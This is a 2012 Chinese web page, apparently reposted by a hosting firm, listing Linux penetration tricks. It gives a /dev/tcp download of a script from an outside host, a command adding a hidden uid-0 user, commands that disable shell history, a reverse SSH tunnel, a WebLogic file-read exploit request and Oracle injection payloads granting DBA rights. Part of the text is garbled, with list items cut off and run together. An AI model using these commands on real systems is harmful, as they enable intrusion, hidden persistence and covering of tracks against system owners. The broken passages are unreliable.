Linux 渗透小常识

作者佚名技术来源 Linux系统浏览发布时间 2012-04-18

1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl 2.Linux添加uid为0的用户
useradd -o -u 0 cnbird 3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null 4.SSH反向链接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口
然后服务器上执行ssh localhost -p 44即可 5.weblogic本地读取文件漏洞
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management 6.apache查看虚拟web目录
./httpd -t -D DUMP_VHOSTS 7.cvs渗透技巧
CVSROOT/passwd UNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries 更新的文件和目录内容
CVS/Repository 8.Cpanel路径泄露
/3rdparty/squirrelmail/functionHTTP/1.1 401 Access Denied S'', ''writeOutputToFile'', ''TEXT'', NULL, NULL, NULL, NULL,0,1,1,1,1,0, ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;''BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO 用户''''; END;'', ''BEGIN NULL; END;'') FROM DUAL; EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(''NO_SUCH_SUBSCRIPTION'', SYSDATE()); set role dba; select * from session_privs; EXEC SYS.VULNPROC(''FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR''); Select DBMS_JAVA.RUNJAVA(''oracle/aurora/util/Test'') FROM DUAL;
SET ROLE DBA; 15. webLogic渗透技巧
四. Weblogin Script Tool(WLST) 写入到<Domain_home>\\config\\config.xml 1.进行修改:
<bea_home>\wlserver_10.0\server\bin\setWLSenv.sh
2.启动WLST
java weblogic.WLST wls:/offline> connect(''admin'', ''admin'', ''t3://127.0.0.1:7001''

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

1 2 下一页

分享到：更多

你可能对下面的文章感兴趣

上一篇: dedecms在linux主机下的一个奇怪错误下一篇: linux vi/vim的使用

关于Linux 渗透小常识的所有评论

随机推荐